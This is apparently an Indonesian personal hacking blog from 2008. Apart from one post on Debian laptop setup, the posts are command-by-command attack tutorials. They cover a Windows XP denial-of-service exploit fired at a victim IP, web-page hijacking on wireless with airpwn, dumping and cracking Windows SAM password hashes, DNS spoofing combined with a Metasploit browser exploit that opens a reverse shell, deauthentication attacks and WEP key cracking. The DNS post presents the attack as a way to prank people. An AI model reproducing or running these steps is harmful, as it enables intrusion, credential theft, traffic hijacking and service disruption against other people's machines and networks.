rada 3rr0r

Debian Isi Sempak

di3d — Fri, 21 Nov 2008 13:13:20 +0000

Horeee, mimpiku selama ini terwujud dengan adanya pendamping baru yang seberanrnya engga
cakep-cakep amat, dengan spesipikasi:
- Sempaq Celeron C700
- Mem 1 Gb
- Hd 120 Gb
- Vga 256 Mb
- Wireless Atheros PCI Express

* Dengan perbekalan seadanya (cdnya minjem), ku ucapkan bissmillah, akhirnya distro debian Etch bersemayam di Sempak, Sempak ??? ya.. Sempak, itulah sebutanku untuk leptopku.

* Kendala yang aku hadapi pertama kali adalah touchpad ga berjalan dengan sempurna,
setelah beberapa malam ku lalui akhirnya aku mendapatkan wangsit dari gusti ALLAH
dengan mencontek konfigurasi xorg.conf dari distro Fedora 8 akhirnya touchpad Sempak
berjalan dengan sempurna di Debian Etch, ini lho konfigurasinya :
===================================================================
# /etc/X11/xorg.conf (xorg X Window System server configuration file)
#
# This file was generated by dexconf, the Debian X Configuration tool, using
# values from the debconf database.
#
# Edit this file with caution, and see the /etc/X11/xorg.conf manual page.
# (Type “man /etc/X11/xorg.conf” at the shell prompt.)
#
# This file is automatically updated on xserver-xorg package upgrades *only*
# if it has not been modified since the last upgrade of the xserver-xorg
# package.
#
# If you have edited this file but would like it to be automatically updated
# again, run the following command:
# sudo dpkg-reconfigure -phigh xserver-xorg

Section “Files”
FontPath “/usr/share/fonts/X11/misc”
FontPath “/usr/X11R6/lib/X11/fonts/misc”
FontPath “/usr/share/fonts/X11/cyrillic”
FontPath “/usr/X11R6/lib/X11/fonts/cyrillic”
FontPath “/usr/share/fonts/X11/100dpi/:unscaled”
FontPath “/usr/X11R6/lib/X11/fonts/100dpi/:unscaled”
FontPath “/usr/share/fonts/X11/75dpi/:unscaled”
FontPath “/usr/X11R6/lib/X11/fonts/75dpi/:unscaled”
FontPath “/usr/share/fonts/X11/Type1″
FontPath “/usr/X11R6/lib/X11/fonts/Type1″
FontPath “/usr/share/fonts/X11/100dpi”
FontPath “/usr/X11R6/lib/X11/fonts/100dpi”
FontPath “/usr/share/fonts/X11/75dpi”
FontPath “/usr/X11R6/lib/X11/fonts/75dpi”
# path to defoma fonts
FontPath “/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType”
EndSection

Section “Module”
Load “i2c”
Load “bitmap”
Load “dbe”
Load “ddc”
Load “dri”
Load “extmod”
Load “freetype”
Load “glx”
Load “int10″
Load “record”
Load “v4l”
Load “vbe”
EndSection

Section “InputDevice”
Identifier “Generic Keyboard”
Driver “kbd”
Option “CoreKeyboard”
Option “XkbRules” “xorg”
Option “XkbModel” “pc104″
Option “XkbLayout” “us”
EndSection

Section “InputDevice”
Identifier “Configured Mouse”
Driver “mouse”
Option “CorePointer”
Option “Device” “/dev/input/mice”
Option “Protocol” “ImPS/2″
Option “Emulate3Buttons” “true”
EndSection

Section “InputDevice”
Identifier “Synaptics Touchpad”
Driver “synaptics”
Option “SendCoreEvents” “true”
Option “Device” “/dev/psaux”
Option “Protocol” “auto-dev”
Option “Emulate3Buttons” “true”
Option “LeftEdge” “120″
Option “RightEdge” “830″
Option “TopEdge” “120″
Option “BottomEdge” “650″
Option “FingerLow” “14″
Option “FingerHigh” “15″
Option “MaxTapMove” “140″
Option “VertScrollDelta” “20″
Option “HorizScrollDelta” “20″
Option “MinSpeed” “0.8″
Option “MaxSpeed” “1.4″
EndSection

Section “Device”
Identifier “Generic Video Card”
Driver “intel”
BusID “PCI:0:2:0″
Option “UseFBDev” “true”
EndSection

Section “Monitor”
Identifier “Generic Monitor”
Option “DPMS”
HorizSync 28-50
VertRefresh 43-75
EndSection

Section “Screen”
Identifier “Default Screen”
Device “Generic Video Card”
Monitor “Generic Monitor”
DefaultDepth 24
SubSection “Display”
Depth 16
Modes “1024×768″ “800×600″ “640×480″
EndSubSection
SubSection “Display”
Depth 24
Modes “1024×768″ “800×600″ “640×480″
EndSubSection
EndSection

Section “ServerLayout”
Identifier “Default Layout”
Screen “Default Screen”
InputDevice “Generic Keyboard”
InputDevice “Configured Mouse”
InputDevice “Synaptics Touchpad”
EndSection

Section “DRI”
Mode 0666
EndSection

===================================================================

* ehhh … pas udah masuk ke GUI wireless Atheros builtin ga bisa konek ke hotspot yang ada di kampus
terpaksa deh bertapa lagi di mbah google (lho kok bisa googling, kan ga bisa konek ???)
hehehe….. bisa donk kan gue punya usb wireless Ralink
tapi selama bertapa bertapa di mbah google selalu mendapat bisikan yang bunyinya BackTrack
yaa.. terpaksa deh pake backtrack dulu untuk sementara.

* Ga puas dengan backtrak akhirnya beralih lagi dengan Debian dengan cara ngompil kernel source
yang ada di Backtrack, ini lho perintahnya :
============================================
$ sudo su -
# cd /usr/src/linux-2.6.21.5
# cp /boot/config-2.6.18-6-686 .config
# make menuconfig
# make all
# make modules_install
# cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.21.5
# mkinitramfs -o /boot/initrd.img-2.6.21.5 2.6.21.5

truz tambahin pilihan kernel di menu.lst

# vim /boot/grub/menu.lst
title Debian GNU/Linux, kernel 2.6.21.5
root (hd0,0)
kernel /boot/vmlinuz-2.6.21.5 root=/dev/sda1 ro
initrd /boot/initrd.img-2.6.21.5
savedefault

# reboot

download driver madwifi di http://metasploit.com/users/hdm/tools/madwifi-r3726-061708-03-hdm.tar.gz
# wget -c http://metasploit.com/users/hdm/tools/madwifi-r3726-061708-03-hdm.tar.gz
# tar zxvf madwifi-r3726-061708-03-hdm.tar.gz -C /usr/local/src/
# cd /usr/local/src/madwifi-r3726-061708-03-hdm/
# make && make install

# modprobe ath_pci
# iwconfig ath0
# ifconfig ath0 up
# iwlist ath0 scanning
==================================================
Allhamdulillah akhirnya wireless builtin ku aktif juga

* Ehh ga lama muncul ide jahil di pikiranku, sebenernya sih cuman ngetes doank apa bener Atherosku bisa
buat modus monitor, ini lho perintahnya :
==============================================
# apt-get install aircrack-ng

# wlanconfig ath0 destroy
# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
# airodump-ng ath0
# aireplay-ng -0 10 -a FF:FF:FF:FF:FF:FF -c FF:FF:FF:FF:FF:FF ath0
==============================================

* Wahhhh ternyata emang mantep dah…. Sempak+Debian ku

thank’s buat:
- z3r0byt3 (makasih atas referensi download madwifi-ng nya)
- kud0 (udah nganterin+nemenin ke mangga dua)
- 3nu (DVD Debiannya udah gue backup)

Menjalankan Exploit (source code) Buat Pemula

di3d — Wed, 05 Nov 2008 13:01:47 +0000

* Banyak sekali exploit-exploit yang yang berasal
dari milw0rm diantaranya adalah “r57windows.c”
ya.. memang ini masih berupa source code,
namun saya tidak akan membedah isi dari source code
tersebut, tetapi bagaimana cara menjalankan exploit
yang masih berbentuk source code.
Di backtrack sendiri telah menyediakan banyak sekali
source code keluaran milw0rm yang berada pada
directory /pentest/exploits

** Exploit ini bekerja untuk membanjiri paket
di sebuah jaringan, dan ampuh untuk menyerang
Windows Server 2003 dan XP SP2, sehingga kinerja
komputer korban akan terasa lambat atau bahkan
Hang beberapa saat.

Persiapan:
- Notebook OS Backtrack
IP = 192.168.2.17

- Komputer Korban OS Windows XP SP2
IP = 192.168.2.20

ON BACKTRACK
—–++—–
# cd /pentest/exploit/milw0rm
# cat sploitlist-bt.txt | grep “Windows XP/2003″
— — — — — — — — — — — — — — —
./platforms/windows/dos/861.c MS Windows XP/2003 Remote Denial of Service Exploit
— — — — — — — — — — — — — — —
— — — — — — — — — — — — — — —
— — — — — — — — — — — — — — —
— — — — — — — — — — — — — — —
# gcc platforms/windows/dos/861.c -o r57windows
# ./r57windows 192.168.2.20 135

referensi :
# http://www.milw0rm.com
# man cat
# man grep
# man gcc
# man strings

Membajak tampilan Website di Wireless Network (Rouge Access Point dengan airpwn)

di3d — Thu, 16 Oct 2008 10:20:39 +0000

Jaringan wireless memang sangat tidak aman jika digunakan untuk
kegiatan bisnis yang bersifat penting, dengan menggunakan metode
rouge Access Point, seorang intruder dengan mudahnya membajak
jaringan wireless dan mengubah halaman website yang dibuka client
dengan tampilan palsu.
OK saya tidak akan bercerita terlalu banyak karena jemari saya
sudah terasa lunglai.
Sebenarnya tulisan ini sudah banyak dibahas di berbagai site ataupun
dari berbagai buku, saya sendiri nyontek dari bukunya Mas Irvan
(LINUX WIRELESS HACKING), yaa… walaupun dia memakai distro Debian,
saya mencoba untuk menerapkannya pada distro Fedora 8 codename Werewolf.

Persiapan
———
- Distro Fedora 8 (Werewolf)
- Wireless USB Dongle (ralink chipset)
- driver ralink
- airpwn
- lorcon

install dependensi yang dibutuhkan
———————————-
# yum install gcc automake kernel-devel libnet-devel prcre-devel

Download source code applikasi
——————————
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon
# wget http://transact.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.3.tgz

Hapus driver ralink default dari kernel linux = rt73usb (wlan0)
—————————————————————
# rm -rvf /lib/modules/`uname -r`/kernel/driver/net/wireless/rt2*
# depmod -a

Compile dan Install Driver Ralink = rt73 (rausb0)
————————————————-
tar jxvf rt73-k2wrlz-3.0.1.tar.bz2
cd rt73-k2wrlz-3.0.1/Module
make
make install

Compile dan Install Lorcon
————————–
# cd lorcon
# ./configure –prefix=/usr \
–localstatedir=/var \
–mandir=/usr/share/man \
–sysconfdir=/etc/lorcon
# make
# make install

Compile dan Install Airpwn
————————–
# tar zxvf airpwn-1.30.tgz
# cd airpwn-1.30
# ./configure –prefix=/usr/local –mandir=/usr/local/share/man
# make
# make install

* ” wew pada saat anda mengcompile airpwn ada tulisan error”
rupanya IFNAMSIZ belum di definisikan di dalam file wireless.h yang
berada di /usr/include/linux

# vi /usr/include/linux/wireless.h
tambahkan baris
#define IFNAMSIZ 16

* ulangi kembali tahap Compile dan Install Airpwn.

MULAI BERAKSI
=============
* Colokin Wireless USB Dongle ke lobang usb
# ifconfig rausb0 up
# iwconfig rausb0 mode monitor
# cd airpwn-1.30
# airpwn -c conf/great_html -d rt73 -i rausb0 -v -v -v
keterangan dari parameter airpwn.
-c = memanggil file konfigurasi dari airpwn.
-d = driver yang digunakan wireless, kebetulan saya menggunakan chipset ralink.
-i = nama device yang digunakan, dalam hal ini ralink telah disupport oleh lorcon
untuk menginject paket wireless.
-v = verbose mode, semakin banyak parameter -v maka semakin cepat pula verbose
yang ditampilkan.

* jika airpwn tidak berjalan, ada baiknya periksa apakah driver
atau chipset yang anda gunakan sudah di support oleh lorcon dan airpwn
jika sudah, tetapi tetap saja macet, coba putuskan koneksi dari client
dengan acess point dengan menggunakan aircrack-ng agar si client mendapatkan
paket arp yang baru.

# yum install aircrack-ng
# aireplay-ng -0 10 -a MAC_ADDR_ACCESS_POINT -c MAC_ADDR_CLIENT rausb0

* kemudian ulangi kembali perintah untuk menjalankan airpwn.

- thK’s :
irvan 4k4 z3r0byt3 (udah ngasih tau cara ngejalanin airpwn)
edday (minjemin leptopnya buat uji coba di kampus)
4de (soryy buat fedora 9, ora iso lungo *&^$(#^%@)
b00gi3 (begadang lagi yuk, ngoprek bareng, soo elo jangan bawa hengpun ????)
y0gie (hhehe.. lgi binun yaaa.. nyari atheross.., pengen bles dendem ???)
m3lar (maenin truzz prensternya ntar ajarin gua yaa…)
ti0 & t0y4n9 (rame luhh berdua, seruuuu)
and all for support me……

Local Exploit (liat password windows xp all)

di3d — Sun, 28 Sep 2008 08:11:45 +0000

Mungkin tulisan saya ini dianggap tidak berguna bagi para guru,
saya tidak menggajak anda untuk melakukan tindakan yang merugikan
bagi khalayak umum tetapi saya hanya ingin membagikan pengalaman saya ini,
tutorial ini saya dapatkan dari http://irongeek.com

persiapan
- CD Backtrack 2 atau 3
- Komputer berOS Windows XP yang akan dijadikan uji coba

*** lets dance ****
1. atur boot squence agar dapat memboot dari cdrom
2. masukan cd backtrack 2 ke dalam cdrom
3. tunggu hingga tampilan login muncul
4. masukan username “root” dan password “toor”
5. periksa apakah drive system windows xp sudah di mount dengan perintah
bt ~ # df -hT
Filesystem    Type    Size Used Avail Use% Mounted on
tmpfs        tmpfs    108M 416K 108M   1% /
/dev/hda1     ntfs    3.0G 1.6G 1.5G 52% /mnt/hda1

- terlihat bahwa sistem windows telah di mount pada direktory /mnt/hda1 dengan filesystem NTFS

6. untuk memulainya ketikan perintah
bt ~ # bkhive /mnt/hda1/WINDOWS/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 64ca9581144e534fa076a9fa2f4548c0

7. perintah selanjutnya untuk mendapatkan hash password
bt ~ # samdump2 /mnt/hda1/WINDOWS/system32/config/SAM system.txt > passhash.txt
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No password for user SUPPORT_388945a0(1002)

8. pada tahap ini sudah didapatkan hash password, gunakan JTR untuk mencrack passwordnya
bt ~ # /pentest/password/john-1.7.2/run/john –format=NT passhash.txt
Loaded 3 password hashes with no different salts (NT MD4 [TridgeMD4])
passwd (b13du9)
password (Administrator)

dapat disimpulkan bahwa user b13du9 menggunakan password “passwd”
dan user Administrator menggunakan password “password”

samdump2, bkhive : http://studenti.unina.it/~mcuomo/syskey/
john the ripper : http://www.openwall.com/john/

-thx Lab Kompi Fakultas Teknik Universitas Bhayangkara,
semua teman-temanku yang lagi demen-demennya sama OS LINUX.

DNS Spoof

di3d — Thu, 04 Sep 2008 18:43:59 +0000

MARHABAN YA RAMADHAN 1429 H / 2008 M

Pada mulanya saya hanya iseng saja menggunakan tool bernama dnsspoof tapi ternyata mengasikan juga bila digabungkan dengan metasploit frameworker 3 bisa ngerjain orang.

langkah pertama download http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

# tar zxvf dsniff-2.3.tar.gz

# cd dsniff-2.3

# ./configure

# ./make && make install

# echo 192.168.0.110 www.google.co.id > hostfile

dimana 192.168.0.110 adalah alamat ip yang sedang kita gunakan

dan www.google.co.id adalah alamat dns yang akan dipalsukan

# dnsspoof -i eth0 -f hosfile

-i adalah parameter untuk kartu jaringan yang digunakan dengan nama eth0 (jika menggunakan wifi rausb0 atau wlan0)

-f adalah tempat atau nama file yang sebelumnya dibuat dengan perintah echo

langkah kedua unduh http://www.metasploit.com/framework/download/

gunakan metasploit untuk memanfaatkan kelemahan IE yang sedang membuka http://www.google.co.id

# ./msfcli exploit/windows/browser/ms06_013_createtextrange SRVHOST=192.168.0.110 SRVPORT=80 PAYLOAD=generic/shell_reverse_tcp LHOST=192.168.0.110 E

saya yakin bahwa anda sudah mengerti cara menggunakan metasploit frameworker 3 ini

tunggu sampai ada salah satu komputer yang sedang membuka http://www.google.co.id

– thk : boogie (pls support me again)

kampus ubhara, semakin hari semakin terbuka bagi para maniak linux

3nu – pls jangan pelit lagi ya… share donk tutor yang ada di desknot luhhh …..

ari sokull – pie kabare mass, wis mangan urung, ojo lali mengko penyakite kambuh meneh

Merubah MAC Address di Linux

di3d — Fri, 06 Jun 2008 19:59:12 +0000

merubah MAC Address di linux tidaklah sesulit merubah Mac Address di Winduz,

[root@localhost ~ ] # ifconfig device_name hw ether mac_address

Exp :

1. ifconfig eth0 down

2. ifconfig eth0 hw ether 44

3. ifconfig eth0 up

4. ifconfig eth0 | grep HWaddr

liat deh perbedaannya sebelum dan sesudah di rubah Mac Address nya

Menembus Proteksi Wireless Acess Point (WEP 64 bit)

di3d — Sun, 06 Jan 2008 08:51:26 +0000

#!/aku berlindung kepada ALLAH dari godaan syaitan yang terkutuk.
#dengan menyebut nama ALLAH yang maha pengasih lagi maha penyayang.
#
#=====================================================
b13du9
b13du9@gmail.com
b13du9.wordpress.com

Alat-alat :>>>
- Fedora Core 8 (code name Werewolf)
- USB Wireless Card (D-Link, Model DWL-G122 H/W Ver:C1) apa aja juga b-leh Asal Ralink Chipset
- driver USB Wireless Card Ralink chipset rt73-k2wrlz-2.0.0.1
- Hack toolz aircrack-ng-0.9.1

periksa apakah kernel-devel, gcc, automake, autoconf udah kepasang di sistem linux
# rpm -qa | grep kernel-devel
# rpm -qa | grep gcc
# rpm -qa | grep autoconf
# rpm -qa | grep automake

hapus modul wireless ralink pada kernel default dengan cara
# rm -f /lib/modules/2.6.23.1-42.fc8/kernel/drivers/net/wireless/rt2x00/rt73usb.ko

memasang driper Ralink
# tar zxvf rt73-k2wrlz-2.0.0.1.tar.gz
# cd rt73-k2wrlz-2.0.0.1/Module
# make
# make install

memasang software Aircrack Next Generation
# tar zxvf aircrack-ng-0.9.1.tar.gz
# cd aircrack-ng-0.9.1
# make
# make install

KASUS : >>>>>>>
Nama device Wireless Card : rausb0
Nama Acess Point : b13du9Net
Mac Address Wireless Card : 00:1B:11:0A:6E:F7
Mac Address Acess Point : 00:14:6C:7E:40:80

colokin usb wireless, periksa apakah modul sudah di load oleh sistem
# iwconfig

jika keluar seperti di bawah ini maka modul sudah di load : lihat rausb0 RT73 WLAN
——-
lo no wireless extensions.

eth0 no wireless extensions.

rausb0 RT73 WLAN
Link Quality:0 Signal level:135 Noise level:141
Rx invalid nwid:0 invalid crypt:0 invalid misc:0
——-
jika belum jalankan perintah
# modprobe rt73

aktifkan wireless
# ifconfig rausb0 up
# ifconfig |grep rausb0
perhatikan MAC Address wirelessnya, inget ya k-lo perlu di catet biar ga lupa

(ini dia MAC Addressnya Wireless Card)
/
———————————————————
rausb0 Link encap:Ethernet HWaddr 00:1B:11:0A:6E:F7
———————————————————

melakukan pasive scanning
# airodump-ng rausb0
plototin tuh MAC Address Acess Poin yang ada di BSSID dan nama AP yang ada di ESSID
catet lagi deh biar ga lupa

Tampilan airodump-ng : >>>>>>
(channel yg dipake) (Mac Address Acess Point) (Nama Acess Point)
/ / \
—–/————-/———————————————————\———
CH 1 ][ Elapsed:/4 s ][ 2008-01-01 00:01 \
/ \
BSSID / PWR RQX Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 20 14 1 54 WEP b13du9Net
BSSID STATION PWR Lost Packets Probes
---------------------------------------------------------------------------------------

bikin paket sampah
# aireplay-ng -1 0 -e b13du9Net -a 00:14:6C:7E:40:80 -h 00:1B:11:0A:6E:F7 rausb0
# aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:1B:11:0A:6E:F7 rausb0
# packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:1B:11:0A:6E:F7 -k 255.255.255.255 -l 255.255.255 -y *.xor -w PaketSampah

monitoring Acess Point yang akan di hack
# airodump-ng --channel 1 --bssid 00:14:6C:7E:40:80 --ivs -w Bajak rausb0
tunggu sampai data terisi kurang lebih 100-an data

Tampilan airodump-ng : >>>>>>
(ini data)
---------------------------------------------/-----------------------------------------
CH 1 ][ Elapsed: 1 s ][ 2008-01-01 00:01 /
/
BSSID PWR RQX Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 3 14 1 54 WEP b13du9Net
BSSID STATION PWR Lost Packets Probes
---------------------------------------------------------------------------------------
lama ya nungguinnya he..he..he..
kirim aja paket sampah yang barusan kita bikin dengan catatan airodump masih berjalan
buka lagi gnome-termianl lagi dan jalankan perintah
# aireplay -2 -r PaketSampah rausb0

Tampilan airodump-ng : >>>>>>
(ini data)
---------------------------------------------/-----------------------------------------
CH 1 ][ Elapsed: 4 s ][ 2008-01-01 00:01 /
/
BSSID PWR RQX Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 100 14 1 54 WEP b13du9Net
BSSID STATION PWR Lost Packets Probes
—————————————————————————————
klo udah dapet data sampe 100 pencet CTRL+C pada airodum-ng dan pada aireplay-ng
trus jalanin aircrack-ng deh sampe dapet passwordnya
# aircrack -n 64 Bajak-01.ivs

semoga tutorial ini bermanfaat untuk anda yang membacanya

r3verenzy : Wireless Hacking on Linux (irvan=23r0by73), Wireless Kungfu (S’to), paman Google.

thk’s to : – ALLAH SWT (Tuhan ku), atas segala ilmu yang diberikan-Nya.
- myM0m (embo ku).
- 23r0by73 (my mentor).
- 4r154y (tengtopnya gw acak-acak ehhh leptop maksudnya).
- 3d3d3y3 udah mbikinin cantena buat gw (gagal juga akhirnya).
- 4d3 minjemin Access Pointnya selama seminggu.
- q-24r7 (d43nk).
and h4ppy h4ck1n9!!

maha benar firman ALLAH.